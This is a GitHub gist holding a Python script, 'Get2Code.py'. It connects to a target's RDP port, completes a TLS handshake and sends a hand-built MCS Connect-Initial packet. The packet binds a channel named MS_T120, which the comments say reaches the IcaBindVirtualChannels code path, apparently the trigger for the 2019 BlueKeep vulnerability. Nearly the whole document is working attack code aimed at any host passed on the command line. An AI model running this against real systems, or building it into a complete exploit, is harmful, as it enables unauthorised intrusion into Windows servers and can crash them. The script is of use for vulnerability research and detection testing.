Skip to content

Instantly share code, notes, and snippets.

@n1xbyte

n1xbyte/Get2Code.py

Created May 19, 2019 04:01
Show Gist options
  • Save n1xbyte/99df9a4b8a3eb583bf562894b24e429f to your computer and use it in GitHub Desktop.
Save n1xbyte/99df9a4b8a3eb583bf562894b24e429f to your computer and use it in GitHub Desktop.
Download ZIP
Raw
Get2Code.py
import socket, sys
from OpenSSL import SSL
from impacket.structure import Structure
class TPKT(Structure):
header = (
('Version','B=3'),
('Reserved','B=0'),
('Length','>H=len(TPDU)+4'),
('_TPDU','_-TPDU','self["Length"]-4'),
('TPDU',':=""'),
)
class TPDU(Structure):
header = (
('LengthIndicator','B=len(VariablePart)+1'),
('Code','B=0'),
('VariablePart',':=""'),
)
class CR_TPDU(Structure):
header = (
('DST-REF','<H=0'),
('SRC-REF','<H=0'),
('CLASS-OPTION','B=0'),
('Type','B=0'),
('Flags','B=0'),
('Length','<H=8'),
)
class RDP_NEG_REQ(CR_TPDU):
structure = (
('requestedProtocols','<L'),
)
def main(host):
tpkt = TPKT()
tpdu = TPDU()
rdp_neg = RDP_NEG_REQ()
rdp_neg['Type'] = 1
rdp_neg['requestedProtocols'] = 1
tpdu['VariablePart'] = rdp_neg.getData()
tpdu['Code'] = 0xe0
tpkt['TPDU'] = tpdu.getData()
# Socket send
s = socket.socket()
s.connect((host,3389))
s.sendall(tpkt.getData())
pkt = s.recv(8192)
# TLS handshake (Version 1 not neccesary but I set up packet captures for it)
ctx = SSL.Context(SSL.TLSv1_METHOD)
tls = SSL.Connection(ctx,s)
tls.set_connect_state()
tls.do_handshake()
# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr
MS_T120 = "\x4d\x53\x5f\x54\x31\x32\x30" #This gets you to code path in IcaBindVirtualChannels
buf = (
#---------------------------------------------------------------------------
"\x02\xf0\x80\x7f\x65\x82\x01\xc2\x04"
"\x01\x01\x04\x01\x01\x01\x01\xff"
#---------------------------------------------------------------------------
# mcsCi variable
"\x30\x19"
"\x02\x01\x22" #MaxChannelIDs
"\x02\x01\x02" #MaxUserIDs
"\x02\x01\x00" #MaxTokenIDs
"\x02\x01\x01" #Priorities
"\x02\x01\x00" #MinThroughput
"\x02\x01\x01" #MaxHeight
"\x02\x02\xff\xff" #MaxMCSPDUSize
"\x02\x01\x02" #ProtocolVersion
#---------------------------------------------------------------------------
# mcsCi variable
"\x30\x19"
"\x02\x01\x01" #MaxChannelIDs
"\x02\x01\x01" #MaxUserIDs
"\x02\x01\x01" #MaxTokenIDs
"\x02\x01\x01" #Priorities
"\x02\x01\x00" #MinThroughput
"\x02\x01\x01" #MaxHeight
"\x02\x02\x04\x20" #MaxMCSPDUSize
"\x02\x01\x02" #ProtocolVersion
#---------------------------------------------------------------------------
# mcsCi variable
"\x30\x1c"
"\x02\x02\xff\xff" #MaxChannelIDs
"\x02\x02\xfc\x17" #MaxUserIDs
"\x02\x02\xff\xff" #MaxTokenIDs
"\x02\x01\x01" #Priorities
"\x02\x01\x00" #MinThroughput
"\x02\x01\x01" #MaxHeight
"\x02\x02\xff\xff" #MaxMCSPDUSize
"\x02\x01\x02" #ProtocolVersion
#---------------------------------------------------------------------------
# gccCCrq variable
"\x04\x82\x01\x61"
"\x00\x05\x00\x14"
"\x7c\x00\x01\x81"
"\x58\x00\x08\x00"
"\x10\x00\x01\xc0"
"\x00\x44\x75\x63"
"\x61\x81\x4a"
#---------------------------------------------------------------------------
# CS_CORE
"\x01\xc0" # Type
"\xea\x00" # Length
"\x0a\x00\x08\x00" # Version
"\x80\x07" # DesktopWidth
"\x38\x04" # DesktopHeight
"\x01\xca" # ColorDepth
"\x03\xaa" # SASSequence
"\x09\x04\x00\x00" # KeyboardLayout
"\xee\x42\x00\x00" # BuildNumber
"\x44\x00\x45\x00"#------
"\x53\x00\x4b\x00"# |
"\x54\x00\x4f\x00"# |
"\x50\x00\x2d\x00"# |
"\x46\x00\x38\x00"# |-- ClientName
"\x34\x00\x30\x00"# |
"\x47\x00\x49\x00"# |
"\x4b\x00\x00\x00"#------
"\x04\x00\x00\x00" # KeyboardType
"\x00\x00\x00\x00" # KeyboardSub
"\x0c\x00\x00\x00" # KeyboardFunc
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"#---
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"# |
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"# |--imeFileName
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"#---
"\x01\xca" # PostBeta2ColorDepth
"\x01\x00" # ProductID
"\x00\x00\x00\x00" # SerialNumber
"\x18\x00" # HighColorDepth
"\x0f\x00" # SupportedColorDepth
"\xaf\x07" # EarlyCapabilityFlags
"\x62\x00\x63\x00\x37\x00\x38\x00\x65\x00\x66\x00\x36\x00\x33\x00\x2d"#--
"\x00\x39\x00\x64\x00\x33\x00\x33\x00\x2d\x00\x34\x00\x31\x00\x39"# |
"\x38\x00\x38\x00\x2d\x00\x39\x00\x32\x00\x63\x00\x66\x00\x2d\x00"# |-- ClientProductID
"\x00\x31\x00\x62\x00\x32\x00\x64\x00\x61\x00\x42\x42\x42\x42\x07"# |
"\x00\x01\x00\x00\x00\x56\x02\x00\x00\x50\x01\x00\x00\x00\x00\x64\x00"#---
"\x00" # ConnType
"\x00" # Padding
"\x64\x00\x00\x00" # ServerProtocol
"\x04\xc0\x0c\x00" # PhysWidth
"\x15\x00\x00\x00" # PhysHeight
"\x00\x00\x00\x00" # Some Opt Field? idk
#---------------------------------------------------------------------------
# CS_SECURITY
"\x02\xc0" # Type
"\x0c\x00" # Length
"\x1b\x00\x00\x00" # EncryptionMethod
"\x00\x00\x00\x00" # Extension
#---------------------------------------------------------------------------
# CS_NET - look in to CHANNEL_DEFs?
# 1st channel
"\x03\xc0" # Name
"\x38\x00" # Length
"\x04\x00\x00\x00" # ChannelCount - "MAX OF 31"
+ MS_T120 + "\x00" # Name (7 Chars + \x00 terminator)
"\x0f\x00\x80\x80" # Options
#-- -- -- -- -- -- -- -- -- --
# 2nd channel
"\x72\x64\x70\x73\x6e\x64\x00\x00"
"\x0f\x00\x00\xc0"
#-- -- -- -- -- -- -- -- -- --
# 3rd channel
"\x63\x6c\x69\x70\x72\x64\x72\x00"
"\x00\x00\xa0\xc0"
#-- -- -- -- -- -- -- -- -- --
# 4th channel
"\x64\x72\x64\x79\x6e\x76\x63\x00"
"\x00\x00\x80\xc0"
#---------------------------------------------------------------------------
# CS_MCS_MSGCHANNEL
"\x06\xc0" # Type
"\x08\x00" # Length
"\x00\x00\x00\x00" # Flags
#---------------------------------------------------------------------------
# CS_MULTITRANSPORT
"\x0a\xc0" # Type
"\x08\x00" # Length
"\x05\x03\x00\x00" # Flags (All Set)
#---------------------------------------------------------------------------
# Additional checked out
# CS_CLUSTER
# CS_MONITOR
# CS_MONITOR_EX
# CS_MCS_MSGCHANNEL
# CS_MULTITRANSPORT
##############################################################################
############################## Server Response ###############################
##############################################################################
# "\x03\x00\x00\x6c\x02\xf0\x80\x7f\x66\x62\x0a\x01\x00\x02\x01\x00"
# "\x30\x1a\x02\x01\x22\x02\x01\x03\x02\x01\x00\x02\x01\x01\x02\x01"
# "\x00\x02\x01\x01\x02\x03\x00\xff\xf8\x02\x01\x02\x04\x3e\x00\x05"
# "\x00\x14\x7c\x00\x01\x2a\x14\x76\x0a\x01\x01\x00\x01\xc0\x00\x4d"
# "\x63\x44\x6e\x28"
#---------------------------------------------------------------------------
# SC_CORE
# "\x01\x0c" Type
# "\x0c\x00" Length
# "\x04\x00\x08\x00" RDP 10.1 servers
# "\x01\x00\x00\x00" RNS_UD_SC_EDGE_ACTIONS_SUPPORTED_V1
#---------------------------------------------------------------------------
# SC_NET
# "\x03\x0c" Type
# "\x10\x00" Length
# "\xeb\x03" ChannelID
# "\x04\x00" ChannelCount
# "\xec\x03" -----
# "\xed\x03" |_ ChannelIDArray
# "\xee\x03" |
# "\xef\x03" -----
#---------------------------------------------------------------------------
# SC_SECURITY
# "\x02\x0c" Type
# "\x0c\x00" Length
# "\x00\x00\x00\x00" NoEncryption
# "\x00\x00\x00\x00" NullEncrpytionLevel
)
tpkt = TPKT()
tpkt['TPDU'] = buf
tls.sendall(tpkt.getData())
pkt = tls.recv(8192)
if __name__ == '__main__':
main(sys.argv[1])
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment